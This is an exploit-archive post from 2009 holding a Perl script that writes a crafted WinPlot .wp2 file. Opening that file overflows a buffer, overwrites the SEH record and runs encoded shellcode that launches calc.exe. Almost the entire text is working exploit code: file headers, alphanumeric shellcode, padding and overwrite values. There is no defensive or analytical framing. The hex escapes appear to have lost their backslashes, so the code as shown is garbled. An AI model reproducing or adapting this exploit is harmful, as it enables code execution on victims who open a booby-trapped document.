Home / os / win10

winplot-overflow.txt

Posted on 21 September 2009

# Author: Rick
# Email: rick2600@hotmail.com
#
# Software: http://math.exeter.edu/rparris/peanut/wp32z.exe
# Version: Compiled in 19 sept 2009
#
# Exec: calc.exe
# Tested on: Windows XP SP2 EN,PT-BR, Vista
# Greeting: Hisok4, All my friends

$header1 =
"x49x03x00x00x19x00x00x00x30x00x00x00x2ex00x00x00".
"x0ex02x00x00x0ex02x00x00x00x00x00x00x01x00x00x00".
"x3dx00x00x00xd9xffxffxffx2cx01x00x00x64x00x00x00".
"x64x00x00x00x00x00x00x00x00x00x00x00x0ax00x00x00".
"x0fx00x00x00x2bxd0x28x01x49x1ex29x01x00x00x00x00".
"x0cx00x00x00x0ax00x00x00x0ax00x00x00x08x00x00x00".
"x0cx00x00x00x0ax00x00x00x0ax00x00x00x0ax00x00x00".
"x0ax00x00x00x0ax00x00x00xf0xffxffxffx00x00x00x00".
"x00x00x00x00x00x00x00x00x90x01x00x00x00x00x00x00".
"x08x02x01x31x43x6fx75x72x69x65x72x20x4ex65x77x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00xf3xffxffxffx00x00x00x00x00x00x00x00".
"x00x00x00x00x90x01x00x00x00x00x00x02x08x02x01x31".
"x53x79x6dx62x6fx6cx00x20x4ex65x77x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"xf3xffxffxffx00x00x00x00x00x00x00x00x00x00x00x00".
"x90x01x00x00x00x00x00x00x08x02x01x31x43x6fx75x72".
"x69x65x72x20x4ex65x77x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00xf5xffxffxff".
"x00x00x00x00x00x00x00x00x00x00x00x00x90x01x00x00".
"x00x00x00x00x08x02x01x31x43x6fx75x72x69x65x72x20".
"x4ex65x77x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00xf0xffxffxffx00x00x00x00".
"x00x00x00x00x00x00x00x00x90x01x00x00x00x00x00x00".
"x08x02x01x02x54x69x6dx65x73x00x72x20x4ex65x77x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00xf3xffxffxffx00x00x00x00x00x00x00x00".
"x00x00x00x00x90x01x00x00x00x00x00x00x08x02x01x02".
"x54x69x6dx65x73x00x72x20x4ex65x77x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"xf3xffxffxffx00x00x00x00x00x00x00x00x00x00x00x00".
"x90x01x00x00x00x00x00x00x08x02x01x31x43x6fx75x72".
"x69x65x72x20x4ex65x77x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00xf3xffxffxff".
"x00x00x00x00x00x00x00x00x00x00x00x00x90x01x00x00".
"x00x00x00x00x08x02x01x31x43x6fx75x72x69x65x72x20".
"x4ex65x77x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00xf3xffxffxffx00x00x00x00".
"x00x00x00x00x00x00x00x00x90x01x00x00x00x00x00x00".
"x08x02x01x31x43x6fx75x72x69x65x72x20x4ex65x77x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00xf3xffxffxffx00x00x00x00x00x00x00x00".
"x00x00x00x00x90x01x00x00x00x00x00x00x08x02x01x31".
"x43x6fx75x72x69x65x72x20x4ex65x77x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x04xf2x12x00xbdx9fx51x00".
"x0cx30x54x00x00x00x00x00x00x04xf2x12x00xbdx9fx51".
"x00x0cx30x54x00x00x00x00x00x00x04xf2x12x00xbdx9f".
"x51x00x0cx30x54x00x00x00x00x00x00x04xf2x12x00xbd".
"x9fx51x00x0cx30x54x00x00x00x00x00x00x01x00x04x00".
"x06x00x00x00x04x00x06x00x05x00x16x00x18x00x00x00".
"x15x00x04x00x00x00x00x00x00x00x00x00x00x00xffxff".
"xffx00xffx00xffx00xffxffx00x00xffx00x00x00x00xbf".
"x3fx00x00x00xffx00x00x7fx7fx00xffx7fx00x00xffx00".
"x7fx00xa0x2fx00x00x00xffxffx00xbfxbfx7fx00x7fx00".
"x7fx00x20xffx00x00xffx7fx7fx00x87x87x00x00x00x3c".
"xa0x00xe0xe0xe0x00xc0xc0xc0x00xa0xa0xa0x00x80x80".
"x80x00x60x60x60x00x40x40x40x00xbfx00x3fx00x7exde".
"xffx00xffxccxccx00xffx7exdex00xffxdex7ex00xdexff".
"x7ex00x7exffxdex00xffxffxbfx00xffxbfxffx00xbfxff".
"xffx00xffxffxdex00xffxdexffx00xdexffxffx00xb1xde".
"xd4x00xb1xd4xdex00xd4xb1xdex00xd4xdexb1x00xdexb1".
"xd4x00xdexd4xb1x00xbfxf1xdex00xbfxdexf1x00xdexf1".
"xbfx00xdexbfxf1x00xf1xdexbfx00xf1xbfxdex00xffx96".
"xeax00x96xeaxffx00xccxccxccx00xc8x70x00x00xdexcd".
"x00x00xdex68x20x00x14x82x28x00xc0x00xa0x00xd4x28".
"x28x00x50x84xb0x00x64xa0xc8x00x14x64x14x00x05x00".
"x7dx00x00x00x01x00x01x00x01x00x0ax00x05x00x02x00".
"x00x00x64x00x03x00x3cx00x07x00x0fx00x01x00x03x00".
"x08x00x0cx00x1ex00x01x00x00x00x00x00x00x00x00x00".
"x00x00x01x00x03x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x01x00x70x00x0cx00".
"x14x00x00x00x00x00x7bx03xffxffx32x00x00x00xb0x00".
"x01x00x00x00x00x00x01x00x00x00xffxffxffxffx00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x01x01x00x00x00x00x01x01x01x00x00x00x00x00".
"x00x01x00x00x01x01x01x01x01x01x01x01x01x01x01x01".
"x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00xa0x01x40x00x00".
"x00x00x00x00x00xa0x01xc0x00x00x00x00x00x00x00xa0".
"x01x40x66x33x44xe9x5cx36x43x94x01xc0x66x33x44xe9".
"x5cx36x43x94x01x40x00x00x00x00x00x00x00x80xffx3f".
"x00x00x00x00x00x00x00x80xffx3fx00x00x00x00x00x00".
"x00x80xffx3fx00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00xf0x04x40x00x00x00x00x00x00x00xa0".
"x05x40x00x00x00x00x00x00x00xf0x04x40x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x80x00x40x00x00x00x00x00x00x00x80x00x40x00x00".
"x00x00x00x00x00x80x00x40x00x30x33x33x33x33x33xb3".
"xfex3fx00xd0xccxccxccxccxccxccxfbx3fx00x00x00x00".
"x00x00x00xa0x01x40x00x00x00x00x00x00x00x00x00x00".
"x00xa8x5exdfx9bx4fx77xd6xfbx3fx00x48xe1x7ax14xae".
"x47x81xffx3fx00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x80xffx3fx00x00x00x00x00x00x00xc0".
"xfex3fx7fx00x20x62x7ex00x00x00x00x00xf0xf4x12x00".
"x01x00x00x00x00x00x00x00x80xf6x12x00x60x48x40x00".
"x38x03x03x00xf0xf4x12x00x78xc0x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00xa0x01x40x00x00".
"x00x00x00x00x00xfax08x40x00xd0xccxccxccxccxccxcc".
"xfbx3fx00x00x00x00x00x00x40x9cx0cx40x00x00x00x00".
"x00x00x00xc8x07x40x00x00x00x00x00x00x00x96x06x40".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x80xffx3fx00x00x00x00x00x00x00xc8x05x40x00x00".
"x00x00x00x00x00xa0x02x40x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00xa0x01x40x00x00x00x00".
"x00x00x00xfax08x40x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00xa0x01x40x00x00x00x00x00x00".
"x00xc8x05x40x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00xa0x01x40x00x00x00x00x00x00x00xc8".
"x05x40x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x80x00x40x00x00x00x00x00x00".
"x00x80x00x40x00x00x00x00x00x00x00x80x00x40x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00xa0x01x40x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"xccx00x00x00xffxffxffxffx00x00x00x00x01x00x14x00".
"x01x00x0fx00x05x00x16x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x01x00x14x00x32x00x00x00".
"x01x00x00x00x01x01x01x00x00x00x00x00x00x00xd0xcc".
"xccxccxccxccxccxfcx3fx00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x80xffx3fx00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x80xffx3fx24".
"x00x24x00x24x00x96x00x96x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x80xffx3fx00x00x00x00x00x00x00x80xff".
"x3fx00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x80xffx3fx00x00x00x00x00x00x00".
"x80xffx3fx00x00x00x00x00x00x00x80xffx3fx00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x80xffx3fx00x00x00x00x00x00x00x80xffx3fx00".
"x00x00x00x00x00x00x80xffx3fx00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00xb8".
"x1cx8ex2dx54xdex73x9exf9x3fx00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x18x00x01".
"x00x00x00x30x75xafx00x34x76xafx00x38x77xafx00x3c".
"x78xafx00x40x79xafx00x44x7axafx00x48x7bxafx00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x04".
"xa7xafx00x00x00x00x00x00x00x00x00x54x8exafx00x00".
"x00x00x00x5cx90xafx00x74xa3xafx00x00x00x00x00x00".
"x00x00x00x01x00x80x97xcdxaax1fxf8xaexe6x00x40x4c".
"x8dx4exf3x22x84x33xb8xfbx3fx00x00x00x00x00x00x00".
"x00x00x00xccx00x00x00x00x00x00x00x00x00x00x00x00".
"x0cxe8xd1x19x4fxc1x05xc9x00x40x00x00x01x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x18x00x01x00x00x00x0dx00x04x00xffxff".
"x00x00x00x00x00x00x01x00x00x01x00x00x0bx00";

$header2 =
"x00x01x00x00x09x00x78x78".
"x2bx79x79x3dx31x33x00x01x00x00x01x00x00x00x49x54".
"x00x10x49x54x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x02x00x78x00x02x00x79x00x02x00x7ax00x00x00".
"x00x00x00x00x00xa0x02xc0x00x00x00x00x00x00x00xa0".
"x02xc0x00x00x00x00x00x00x00xa0x02xc0x00x00x00x00".
"x00x00x00xa0x02xc0x00x00x00x00x00x00x00xa0x02xc0".
"x00x00x00x00x00x00x00xa0x02xc0x00x00x00x00x00x00".
"x00xa0x02xc0x00x00x00x00x00x00x00xa0x02xc0x00x00".
"x00x00x00x00x00xa0x02xc0x00x00x00x00x00x00x00xa0".
"x02xc0x00x00x00x00x00x00x00xa0x02xc0x00x00x00x00".
"x00x00x00xa0x02xc0x00x00x00x00x00x00x00xa0x02xc0".
"x00x00x00x00x00x00x00xa0x02xc0x00x00x00x00x00x00".
"x00xa0x02xc0x00x00x00x00x00x00x00xa0x02xc0x00x00".
"x00x00x00x00x00xa0x02xc0x00x00x00x00x00x00x00xa0".
"x02xc0x00x00x00x00x00x00x00xa0x02xc0x00x00x00x00".
"x00x00x00xa0x02xc0x00x00x00x00x00x00x00xa0x02xc0".
"x00x00x00x00x00x00x00xa0x02xc0x00x00x00x00x00x00".
"x00xa0x02xc0x00x00x00x00x00x00x00xa0x02xc0x00x00".
"x00x00x00x00x00xa0x02xc0x00x00x00x00x00x00x00xa0".
"x02xc0x00x00x00x00x00x00x00xa0x02xc0x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x9bx4a".
"xbbxa2x58x54xf8xadx00x40x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x80x97xcdxaa".
"x1fxf8xaexe6x00x40x4cx8dx4exf3x22x84x33xb8xfbx3f".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00xa0x02x40x00x00x00x00x00x00x00xa0x02x40x00x00".
"x00x00x00x00x00xa0x02x40x00x00x00x00x00x00x00xa0".
"x02x40x00x00x00x00x00x00x00xa0x02x40x00x00x00x00".
"x00x00x00xa0x02x40x00x00x00x00x00x00x00xa0x02x40".
"x00x00x00x00x00x00x00xa0x02x40x00x00x00x00x00x00".
"x00xa0x02x40x00x00x00x00x00x00x00xa0x02x40x00x00".
"x00x00x00x00x00xa0x02x40x00x00x00x00x00x00x00xa0".
"x02x40x00x00x00x00x00x00x00xa0x02x40x00x00x00x00".
"x00x00x00xa0x02x40x00x00x00x00x00x00x00xa0x02x40".
"x00x00x00x00x00x00x00xa0x02x40x00x00x00x00x00x00".
"x00xa0x02x40x00x00x00x00x00x00x00xa0x02x40x00x00".
"x00x00x00x00x00xa0x02x40x00x00x00x00x00x00x00xa0".
"x02x40x00x00x00x00x00x00x00xa0x02x40x00x00x00x00".
"x00x00x00xa0x02x40x00x00x00x00x00x00x00xa0x02x40".
"x00x00x00x00x00x00x00xa0x02x40x00x00x00x00x00x00".
"x00xa0x02x40x00x00x00x00x00x00x00xa0x02x40x00x00".
"x00x00x00x00x00xa0x02x40xb0x8exaax00x0cx00x00x00".
"x00x00x00x00xf0xf4x12x00x40xb0x8exaax00x0cx00x00".
"x00x00x00x00x00xf0xf4x12x00x40xb0x8exaax00x0cx00".
"x00x00x00x00x00x00xf0xf4x12x00x40x00x00x00x00x00".
"x00x01x00x00x00x00x78x78x2bx79x79x3dx31x33x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x7dx59x00x00x10x49x54x00x10x49x54x00x00".
"x00x00x00xbfx00x3fx00xaax55x77x03x65xa4x24x9ex01".
"xc0x00x00x00x00x00x00x00xa0x01x40x66x33x44xe9x5c".
"x36x43x94x01xc0x10x89xbbxecxc1xdax67x92x01x40xf3".
"xffxffxffx00x00x00x00x00x00x00x00x00x00x00x00x90".
"x01x00x00x00x00x00x00x08x02x01x31x43x6fx75x72x69".
"x65x72x20x4ex65x77x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00xfexffx00x00x00x00x00x00x00x00x00x01x00x00";

$shellcode =
"xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49".
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36".
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34".
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41".
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x54".
"x42x50x42x50x42x30x4bx38x45x44x4ex43x4bx58x4ex57".
"x45x50x4ax37x41x50x4fx4ex4bx38x4fx44x4ax31x4bx38".
"x4fx55x42x32x41x30x4bx4ex49x34x4bx58x46x43x4bx58".
"x41x50x50x4ex41x53x42x4cx49x49x4ex4ax46x38x42x4c".
"x46x47x47x30x41x4cx4cx4cx4dx50x41x30x44x4cx4bx4e".
"x46x4fx4bx43x46x55x46x52x46x50x45x47x45x4ex4bx58".
"x4fx35x46x42x41x50x4bx4ex48x36x4bx58x4ex30x4bx34".
"x4bx48x4fx35x4ex51x41x30x4bx4ex4bx38x4ex31x4bx48".
"x41x30x4bx4ex49x38x4ex35x46x32x46x50x43x4cx41x33".
"x42x4cx46x36x4bx48x42x54x42x33x45x38x42x4cx4ax57".
"x4ex50x4bx48x42x54x4ex30x4bx38x42x57x4ex41x4dx4a".
"x4bx48x4ax46x4ax30x4bx4ex49x50x4bx58x42x48x42x4b".
"x42x50x42x30x42x30x4bx38x4ax36x4ex53x4fx35x41x43".
"x48x4fx42x46x48x55x49x48x4ax4fx43x58x42x4cx4bx57".
"x42x35x4ax36x42x4fx4cx58x46x50x4fx55x4ax46x4ax49".
"x50x4fx4cx58x50x50x47x35x4fx4fx47x4ex43x46x41x46".
"x4ex46x43x36x42x30x5a";

$seh = "xe8x4exf6xffxff";
$neh = "x4dx23x50x00";
$junk = "x41" x 2309;
$junk2 = "x42" x (2327-length($shellcode));

$buffer = $header1.$junk.$shellcode.$junk2.$neh.$seh.$header2;
print "crafted file: winplotxpl.wp2
";

open (FILE, ">winplotxpl.wp2");
print FILE $buffer;
close(FILE);

 

TOP